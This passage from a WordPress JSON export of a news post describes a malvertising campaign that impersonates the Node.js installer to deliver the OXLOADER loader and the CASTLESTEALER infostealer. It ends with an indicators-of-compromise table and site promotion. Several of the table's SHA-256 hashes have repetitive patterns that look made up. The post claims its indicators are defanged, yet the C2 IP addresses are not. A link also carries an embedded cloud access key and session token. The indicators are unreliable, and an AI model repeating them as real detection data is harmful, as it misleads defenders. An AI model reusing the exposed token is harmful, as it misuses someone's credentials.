href=\"https:\/\/cybersecuritynews.com\/qwizzserial-android-malware-as-legitimate-apps\/\" id=\"113954\" target=\"_blank\" rel=\"noreferrer noopener\">a space legitimate programs never use for executable instructions<\/a>, and unpacks itself in memory using self-modifying decryption routines. <\/p>\n<p class=\"wp-block-paragraph\">The final payload, CASTLESTEALER, is then delivered entirely in memory using an open-source shellcode generator called DonutLoader, leaving almost no trace on disk.<a href=\"https:\/\/ppl-ai-file-upload.s3.amazonaws.com\/web\/direct-files\/attachments\/11146061\/b26ceb1b-0605-44a5-b379-3c9a0c6d2a09\/Hackers-Impersonate-Node.js-Installer-in-Google-Ads-to-Deploy-Infostealer-Malware.pdf?AWSAccessKeyId=ASIA2F3EMEYERYFNWZ2G&amp;Signature=98sOk35KC8Xt6%2BvqANpHnBKqD3w%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEDYaCXVzLWVhc3QtMSJHMEUCIBAN%2FZ%2Bs0olm6FRZyCJ8%2FSqGieRf3TbCw19bT%2FS7DIWTAiEA6MHZ8GWeckriHwsaKmHhmI538PvZKeUCLEgNF0ldGcQq%2FAQI%2Fv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgw2OTk3NTMzMDk3MDUiDFQGNxpsAOrV6AIKDCrQBPrlmB6dXsSqINqlGzMwl6%2B0r5jS7V2zx7xcx0QqLVgMDS6ZTdQZAW27iAk14BNoLeYHZH%2F7diIk0nnc%2FlnI%2BFBt6tePrhST53nQ3OSYTQkva9GAQ9YEIo6%2BBEzRtcFc31ENP6KkAYYRuIXz5ZZEE5do6QIX1MmqBC%2Bzxuk%2Fhr5%2BXowrfMcy6R2cD6DjpbDCACsc%2BEw16ZiWFuH0ZB%2FlWzYHcBTzEVXaU4n4t4HyUkmpRdJWnbONgX8Lv2FkWFCnocLRUozlm0BK%2F2wi4wb5UArxn0L8H6XYWgTs%2FgMxTZccIFn1iev38KnemGAXTBTTrCk9SaPmCnW6UpxC1Q2rUYY8Tf77nJ%2FKJKNiBSQJsfto6fNSNPDaMut10UNH%2BEAQT9Bx0OIvUPBhW7oZdtq1c%2F9safEpEkQDUteLwKprarri%2BO9zfj453zt2PT30Iclz%2BO05Sl2kds0BpTWOML45%2BAGOmAaV%2B1GgC8Ox%2BURL1Jqg7FDA3ahpMMNlIMS7WcHFErJnFzcPzo2jqdOdb605F4fESKHlqu%2B%2Bq0qWG3cS6uk38Wc2vTGoBME3E9OhHiR6jTfwAtsdtjxftKegaODZ1bMrtzhWRWVxu0uPCmOOJQStvS2gq6BuyXNAWO3NxrHkA4MIYrlWgiHWs%2Fi3RlLL2XaLrhoKLEyKmHyXxqr8xrbSf0gTTb%2BHd8%2BaTr2lnjDgon93AdmdR%2Bvz1wjdTKqA8cqfKi2t4mIKxLgEQcExDmqiByHzUmOOeppHKBZA3jYHfydjOFi4NMYgMcstMeYqapswhIrj0QY6mAGUZQmVG5dkhN%2BQN4R0Ry9FKvKvAROj9cc3ZjXLEglJyRehEBWIZQ9F9921YfBwskRk0pPoFEJvzqk8Osz6O03bOSFinOrZ%2FH6kL8cjLJ3PVxWsVRehB3kQGGXHT6zYkRcBlTOXYovRetBlOU5qft1k9JZ57ixOVlLU90nZVc4%2Bl9dRKAAqVN8p7MQPurRFx%2BAd0fOrl1v73g%3D%3D&amp;Expires=1782108887\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p class=\"wp-block-paragraph\" id=\"h-indicators-of-compromise-iocs\"><strong>Indicators of Compromise (IoCs):-<\/strong><\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<thead>\n<tr>\n<th class=\"has-text-align-left\" data-align=\"left\">Type<\/th>\n<th class=\"has-text-align-left\" data-align=\"left\">Indicator<\/th>\n<th class=\"has-text-align-left\" data-align=\"left\">Description<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Domain<\/td>\n<td>nodejs-preventive<math><semantics><mrow><mi mathvariant=\"normal\">.<\/mi><\/mrow><\/semantics><\/math>.info<\/td>\n<td>Malvertising landing page<\/td>\n<\/tr>\n<tr>\n<td>Domain<\/td>\n<td>app<math><semantics><mrow><mi mathvariant=\"normal\">.<\/mi><\/mrow><\/semantics><\/math>.miloyannopoulos<math><semantics><mrow><mi mathvariant=\"normal\">.<\/mi><\/mrow><\/semantics><\/math>.com<\/td>\n<td>Malvertising redirector<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>fdfc9780b3c67acac3ca1acfdc9a890dcfee2d5d58fbcef8eac3fc80aa1cf2b3<\/td>\n<td>OXLOADER downloader and launcher (Bild0erSetup.bat)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>de2b7c7a9e7c006e7ca990e77e7dff9b8b73aa9e9e24b98a7f88d3b3fff7c2b3<\/td>\n<td>OXLOADER downloader and launcher (Bild0erSetup.bat variant)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>ca99a9fd118f8a99a9bc99ca9bb9cdfc7cd3b3db9fbcd3fecd3fecd7fe9f0f6f<\/td>\n<td>apimonitor-x64.exe (OXLOADER)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>ce8f8dcb3ca9e9190fd7818f1e7ab87b9fc8f8e7fc88fee8fcc8f8e7fc88fee8<\/td>\n<td>node-v20.7.0-x64.exe (OXLOADER)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>9a67a98fdc9e8e6e7886e9c0e8c668b87c0b66e8f07c8e1f7e89f7c8ca7e8cc8<\/td>\n<td>CASTLESTEALER<\/td>\n<\/tr>\n<tr>\n<td>IPv4<\/td>\n<td>52.78.2.74<\/td>\n<td>CASTLESTEALER C2<\/td>\n<\/tr>\n<tr>\n<td>IPv4<\/td>\n<td>52.78.77.48<\/td>\n<td>CASTLESTEALER C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p class=\"wp-block-paragraph\"><strong>Note:<\/strong>\u00a0<em>IP addresses and domains are intentionally defanged (e.g.,\u00a0<\/em><code><em>[.]<\/em><\/code><em>) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM<\/em>.<\/p>\n<p class=\"has-text-align-center has-background wp-block-paragraph\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 90%,rgb(169,184,195) 100%)\"><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in<\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong> <strong><strong><a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener\">Google<\/a><\/strong><\/strong>.<\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/hackers-impersonate-node-js-installer-in-google-ads\/\">Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/hackers-impersonate-node-js-installer-in-google-ads\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware Hackers are using fake Google Ads to push a brand-new malware loader that disguises itself as the popular Node.js installer. The campaign has been actively targeting Windows users in the United States, silently dropping a dangerous infostealer onto their machines after just a single [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-13776","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/13776"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=13776"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/13776\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=13776"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=13776"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=13776"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}